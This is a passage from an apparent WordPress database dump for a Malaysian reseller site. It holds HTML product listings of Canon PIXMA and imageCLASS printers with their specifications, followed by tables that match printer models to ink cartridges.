</td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-24 16:04:38','2019-09-24 08:04:38','',1449,'https://bintara.com.my/blog/2019/09/24/1449-revision-v1/',0,'revision','',0),(3298,1,'2019-09-24 16:01:56','2019-09-24 08:01:56','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center><p>Â </p>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><p>Â </p><p>Â </p><center></center><center></center><center></center><center></center><center></center><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center><p>Â </p>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Laser Printers :-</h3>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<h4>Compact with wireless connectivity</h4><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Printing</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 43ppm</li><li>Recommended monthly print volume: 2,000 - 7,500 pages</li><li>FPOT: 6.2secs. (A4)</li><li>Max. paper input capacity: Up to 2,300 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 38ppm</li><li>Recommended monthly print volume: 750 - 4,000 pages</li><li>FPOT: 5.5secs. (A4)</li><li>Max. paper input capacity: Up to 900 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Cartridge Printers :-</h3>		\n		<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>imagePROGRAF PRO-500</p></td><td width=\"208\"><p>Maintenance Cartridge MC-20</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY iB4170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5070</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5370</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5470</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA E3170</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E410</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA E4270</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E470</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E477</p></td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E480</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E510</p></td><td width=\"208\"><p>CL-98 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-88 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560 / E560R</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G2010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G4010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP100</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110 (with battery)</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP1300</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2770 / iP2772</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2870S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA iP4200</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 